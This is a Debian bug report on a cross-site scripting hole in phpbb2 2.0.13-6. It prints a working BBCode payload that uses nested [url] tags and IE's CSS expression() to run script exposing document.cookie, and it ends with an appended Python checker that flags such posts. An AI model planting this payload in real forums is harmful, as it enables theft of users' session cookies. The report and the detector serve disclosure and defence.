Package: phpbb2
Version: 2.0.13-6
Severity: serious

XSS was reported on bugtraq 05 July.
Just tested it on my phpbb2 installation and found the following code shows cookies on MS IE.

[color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`alert(document.cookie);this.sss=null`style='font-size:0;][/url][/url]'[/color]

-- System Information:
Debian Release: 3.1
  APT prefers testing
  APT policy: (620, 'testing'), (600, 'unstable'), (550, 'experimental')
Architecture: i386 (i686)
Kernel: Linux 2.6.11-1-686
Locale: LANG=ru_RU.KOI8-R, LC_CTYPE=ru_RU.KOI8-R (charmap=KOI8-R)

Versions of packages phpbb2 depends on:
ii  apache [httpd]        1.3.33-6      versatile, high-performance HTTP s
ii  debconf               1.4.30.13     Debian configuration management sy
ii  libapache-mod-php4    4:4.3.10-15   server-side, HTML-embedded scripti
ii  php4                  4:4.3.10-15   server-side, HTML-embedded scripti
ii  php4-mysql            4:4.3.10-15   MySQL module for php4

-- debconf information:
* phpbb2/httpd: apache
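A check a board administrator could run over stored or incoming post bodies, added here as an example and not part of the original report or of phpBB's code: it flags the markup features the reported string combines (a nested [url] tag, attribute-breaking characters in a [url] argument or target, and CSS expression()). The name audit_post, the reason strings and the benign sample are assumptions for illustration.

```python
import re

# Reported string from the bug report above, split only for line length.
REPORTED = (
    "[color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'"
    "style='top:expression(eval(this.sss));'sss=`alert(document.cookie);"
    "this.sss=null`style='font-size:0;][/url][/url]'[/color]"
)
# Constructed benign post for comparison.
BENIGN = "[url=http://example.org/]Bob's page[/url] [url]http://example.org/a[/url]"

# [url], [url=ARG] and [/url]; ARG runs up to the next "]".
URL_TAG = re.compile(r"\[(/?)url(?:=([^\]]*))?\]", re.IGNORECASE)
# Characters that can end an HTML attribute value if copied into one unescaped.
ATTR_BREAKERS = re.compile(r"""['"`<>]""")
# IE dynamic CSS property used by the reported string to run script.
CSS_EXPRESSION = re.compile(r"expression\s*\(", re.IGNORECASE)


def audit_post(text):
    """Return the sorted reasons a post body should be held for review."""
    reasons = set()
    stack = []  # per open tag: body offset when the body is the link target
    for m in URL_TAG.finditer(text):
        closing, arg = m.group(1), m.group(2)
        if not closing:
            if stack:
                reasons.add("nested [url] tag")
            if arg is not None and ATTR_BREAKERS.search(arg):
                reasons.add("attribute-breaking character in [url=...] argument")
            stack.append(m.end() if arg is None else None)
        elif stack:
            start = stack.pop()
            if start is not None and ATTR_BREAKERS.search(text[start:m.start()]):
                reasons.add("attribute-breaking character in [url] target")
        else:
            reasons.add("unbalanced [url] tags")
    if stack:
        reasons.add("unbalanced [url] tags")
    if CSS_EXPRESSION.search(text):
        reasons.add("CSS expression() in post")
    return sorted(reasons)


if __name__ == "__main__":
    for name, post in (("reported", REPORTED), ("benign", BENIGN)):
        print(name, audit_post(post))
```

A hit means the post should be reviewed by hand; the check does not replace escaping BBCode arguments when they are rendered into HTML.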